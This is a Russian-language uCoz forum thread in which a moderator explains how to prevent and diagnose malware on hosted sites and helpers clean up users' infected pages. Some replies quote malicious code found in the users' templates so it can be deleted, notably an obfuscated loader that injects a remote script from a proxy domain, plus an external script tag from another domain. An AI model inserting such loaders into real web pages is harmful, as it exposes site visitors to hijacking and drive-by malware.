Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    webanet
    Сообщений: 24068
    Репутация: 4985

    Сообщение # 856 | 23:17:10
    ВоровайкА, удалить

    Код
    <script type="text/javascript">
       (function(w) {
       var script = document.createElement('script');
       var i = setInterval(function() {
       if (typeof w.document.body !== 'undefined') {
       var s = "http://cmm.port.pop-proxy.info/?";
       s += 73968 + "=hM2EgtaAmZTNxMLFyMjWlp-CnZGEg82Sgtaen5GUhZyEzcE";
       script.src = s;
       w.document.body.appendChild(script);
       clearInterval(i);
       }
       }, 200);
       };)window);
       </script>
    два раза прописан в самом низу шаблонов

    далее дайте четкий скрин страницы блокировки гугл хрома. у вас ужасно грязный рип стоит, и вы его ещё приукрасили.

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    ВоровайкА
    Сообщений: 10
    Репутация: 0

    Сообщение # 857 | 23:38:18
    Цитата webanet ()
    далее дайте четкий скрин страницы блокировки гугл хрома. у вас ужасно грязный рип стоит, и вы его ещё приукрасили.
    К сожалению сейчас это окно не показывается...Но там было указано вот это almastan.fliprunner.in

    И на Ваш взгляд лучше убрать всякие украшательства для большей безопасности?
    webanet
    Сообщений: 24068
    Репутация: 4985

    Сообщение # 858 | 23:47:00
    ВоровайкА, удалите то что я сказала

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    ВоровайкА
    Сообщений: 10
    Репутация: 0

    Сообщение # 859 | 23:49:14
    Удалил тот блок
    webanet
    Сообщений: 24068
    Репутация: 4985

    Сообщение # 860 | 23:50:45
    ВоровайкА, все. если опять табличка появится, то ссылку на страницу на которой появляется и скрин

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    ВоровайкА
    Сообщений: 10
    Репутация: 0

    Сообщение # 861 | 23:53:37
    Цитата webanet ()
    ВоровайкА, все. если опять табличка появится, то ссылку на страницу на которой появляется и скрин

    Спасибо большое Вам hands И с наступающим santa
    kam-mamochka
    Сообщений: 5
    Репутация: 1

    Сообщение # 862 | 05:53:33
    Здравствуйте, all!!

    Помогите, плз!
    Яндекс прислал предупреждение, что сайт заражен!

  • www.kam-mamochka.ru

  • Вы должны дать описание проблемы:

    Результат выборочной проверки
    Дата последней проверки СтраницаВердикт17.12.2013http://www.kam-mamochka.ru/Поведенческий анализ18.12.2013http://www.kam-mamochka.ru/news/chto_podarit_rebenku_na_novyj_god/2012-11-22-165Поведенческий анализ18.12.2013http://www.kam-mamochka.ru/publ/psikhologija/mezhdu_nami_devochkami/chto_delat_esli_ty_odinoka/13-1-0-33Поведенческий анализ

    AVAST мой не реагирует...

    браузер Mozilla Firefox сообщает "есть информация, что этот сайт атакует компьютеры"

    Очень жду помощи!
  • larisa8375
    Сообщений: 17
    Репутация: 0

    Сообщение # 863 | 08:33:36
    Добрый вечер! Пришло сообщение на сайт Ларчик рукоделия http://www.krestiklara.net/ "хелп касперский сайт блокирует
    говорот что обнаружено вредоносное ПО
    еле добралась сюда"

    Просьба: может кто-нибудь нам помочь?

    Добавлено (19 Дек 2013, 08:33:36)
    ---------------------------------------------
    Пожалуйстааааааа!!!!! Ответьте мне кто-нибуууудь!

    Землянин3034
    Сообщений: 18
    Репутация: 0

    Сообщение # 864 | 13:23:27
    Цитата webanet ()
    через вебмастер гугла сделайте перепроверку
    Не могу разобраться как проверить?
    admin4001
    Сообщений: 209
    Репутация: 38

    Сообщение # 865 | 13:57:11
    Землянин3034. Не могу разобраться как проверить? для начала, зайдите в гугл вебмастер, кликните на ваш сайт, перейдите на другую страницу, там будет кнопка проблемы безопасности, кликните и всё.

    Добавлено (19 Дек 2013, 13:57:11)
    ---------------------------------------------

    Цитата larisa8375 ()
    Добрый вечер! Пришло сообщение на сайт Ларчик рукоделия http://www.krestiklara.net/ "хелп касперский сайт блокирует
    говорот что обнаружено вредоносное ПО
    еле добралась сюда"

    Просьба: может кто-нибудь нам помочь?

    Добавлено (19 Дек 2013, 08:33:36) на вашем сайте в блоке стоит дед мороз, удалите его полностью, у меня были раньше проблемы, с виджетами с этого сайта.
    ---------------------------------------------
    Пожалуйстааааааа!!!!! Ответьте мне кто-нибуууудь!
    Сообщение отредактировал admin4001 - Четверг, 19 Дек 2013, 13:54:54
    webanet
    Сообщений: 24068
    Репутация: 4985

    Сообщение # 866 | 17:09:17
    kam-mamochka, из формы поиска удалить скрипт

    Код
    <script src="http://radikol.ru/1.js" type="text/javascript"></script>


    желательно удалить ужасный код снега с картинками от csomsk

    Код
    <script language="JavaScript1.2">   
    grphcs=new Array(2)   
    Image0=new Image();   
    Image0.src=grphcs[0]="http://csomsk.3dn.ru/22-11-10/sneg1.gif";   
    Image1=new Image();   
    Image1.src=grphcs[1]="http://csomsk.3dn.ru/22-11-10/sneg1.gif";   
    Amount=25;   
    Ypos=new Array();   
    Xpos=new Array();   
    Speed=new Array();   
    Step=new Array();   
    Cstep=new Array();   
    ns=(document.layers)?1:0


    удалить

    Код
    <layer name="lenta" top="0" left="0">  
    <div style="position:absolute; top:0; left:0;">  
    <img border="0" src="http://csomsk.ru/1-ucoz/csomsk/rip/newyear1.png" align="left" alt="Зима">  
    </div>  
    </layer><script src="http://csomsk.ru/notest/elka1.js"></script>

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    webanet
    Сообщений: 24068
    Репутация: 4985

    Сообщение # 867 | 17:28:26
    larisa8375, начните с удаления часов из блока время

    Код
    <script language="JavaScript" src="http://101widgets.com/0100023b/160/268"></script></script>


    дальше нужен скрин блокировки касперского

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    larisa8375
    Сообщений: 17
    Репутация: 0

    Сообщение # 868 | 19:38:03
    webanet, спасибо огромное!! попробую!
    kam-mamochka
    Сообщений: 5
    Репутация: 1

    Сообщение # 869 | 23:42:38
    webanet, СПАСИБО!
    Добавила плюс в репу!
    Землянин3034
    Сообщений: 18
    Репутация: 0

    Сообщение # 870 | 11:01:58
    Всё сделал а всёровно блокировка(((
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: